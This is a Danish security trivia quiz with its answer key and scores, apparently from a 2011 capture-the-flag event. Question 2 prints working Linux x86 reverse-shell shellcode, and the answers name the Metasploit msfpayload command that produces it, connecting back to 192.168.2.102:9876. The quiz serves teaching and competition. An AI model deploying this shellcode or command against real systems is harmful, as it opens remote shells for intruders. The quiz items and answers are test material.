Piratviden 1

Besvar flest mulige spørgsmål. Hvis I giver op, så send hvad I har.

 

1) Hvad er navnet på den kontroversielle, selvudnævnte sikkerhedsekspert og podcaster, som bl.a. hævdede at have opfundet syn cookies ?

2) Hvad gør den følgende Linuxbaserede x86 shellcode ?

unsigned char shellcode[] = 
"\x31\xc9\x31\xdb\x6a\x46\x58\xcd\x80\x6a\x3d\x89\xe3\x6a\x27" 
"\x58\xcd\x80\x89\xd9\x58\xcd\x80\x31\xc0\x50\x66\x68\x2e\x2e"
"\x89\xe3\x6a\x3d\x59\xb0\x0c\xcd\x80\xe2\xfa\x6a\x3d\x89\xd9"
"\x58\xcd\x80\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0"
"\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x02\x66\x66\x68\x26\x94\x66"
"\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87"
"\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31"
"\xdb\x6a\x01\x58\xcd\x80";

3) Hvad er svaret på følgende ethernet II packet capture ?

0000  00 15 17 30 b3 15 00 22  19 12 2f da 08 00 45 00
0010  00 3a b3 d9 00 00 40 11  c3 90 c0 a8 c0 f9 c0 a8
0020  c0 fe bd 03 00 35 00 26  03 81 1f 1a 01 00 00 01
0030  00 00 00 00 00 00 03 77  77 77 05 70 72 6f 73 61
0040  02 64 6b 00 00 01 00 01

4) Hvad vil være et mere sigende navn (fra C's standard bibliotek) for følgende funktion ?

Dump of assembler code for function mystery_function
   0x080483e4  <+0>:    push   ebp
   0x080483e5  <+1>:    mov    ebp,esp
   0x080483e7  <+3>:    sub    esp,0x10
   0x080483ea  <+6>:    mov    eax,DWORD PTR [ebp+0x8]
   0x080483ed  <+9>:    mov    DWORD PTR [ebp-0x4],eax
   0x080483f0 <+12>:	nop
   0x080483f1 <+13>:	mov    eax,DWORD PTR [ebp+0xc]
   0x080483f4 <+16>:	movzx  edx,BYTE PTR [eax]
   0x080483f7 <+19>:	mov    eax,DWORD PTR [ebp+0x8]
   0x080483fa <+22>:	mov    BYTE PTR [eax],dl
   0x080483fc <+24>:	mov    eax,DWORD PTR [ebp+0x8]
   0x080483ff <+27>:	movzx  eax,BYTE PTR [eax]
   0x08048402 <+30>:	test   al,al
   0x08048404 <+32>:	setne  al
   0x08048407 <+35>:	add    DWORD PTR [ebp+0x8],0x1
   0x0804840b <+39>:	add    DWORD PTR [ebp+0xc],0x1
   0x0804840f <+43>:	test   al,al
   0x08048411 <+45>:	jne    0x80483f1 
   0x08048413 <+47>:	mov    eax,DWORD PTR [ebp-0x4]
   0x08048416 <+50>:	leave  
   0x08048417 <+51>:	ret

5) Hvilken farve har NSA's hackerhold, som angriber det blå hold ?

6) Hvornår blev første x64 Linux payload tilføjet til Metasploit ?

7) Mr. Potatohead! ?????? are NOT secrets!

8) Hvad hedder disse tre gutter ?

9) Hvilket populært e-zine så dagens lys 17. november 1985 ?

10) Hvad er navnet på den fiktive person, som kan udføre man-in-the-middle angreb på kommunikationen mellem Alice og Bob ?


 

  1. Holdet som svarer flest spørgsmål (først) får 200
  2. Næste får 100
  3. Tredje får 50

Points givet:

  • 2011-11-05 04:26 'EuroNOP' 200 - 9 rigtige svar
  • 2011-11-05 07:18 'Pwnies' 100 - 9 rigtige svar
  • 2011-11-05 00:29 'Ring0' 50 - 8 rigtige svar

De rigtige svar er:

  1. Steve Gibson. (Dan J. Bernstein ér faktisk ham som opfandt syn cookies, men han er ikke podcaster)
  2. Den er genereret med Metasploit med kommandoen: ./msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.2.102 AppendExit=true PrependChrootBreak=true LPORT=9876 C
  3. Det er et DNS opslag på www.prosa.dk's A record. Svaret er 194.28.252.43.
  4. strcpy
  5. Rød (NSA Red Team)
  6. 'svn log https://www.metasploit.com/svn/framework3/trunk/modules/payloads/singles/linux/x64' siger '2011-05-21 01:51:19 +0200' (svarene 2011-05-21 og 2011-05-20 er begge accepteret)
  7. Svar: 'Backdoors'. Fra War Games.
  8. Adrian Lamo, Kevin Mitnick og Kevin Poulsen
  9. Phrack
  10. Mallory (MITM kræver modifikation af dataene, og Eve kan kun lytte med)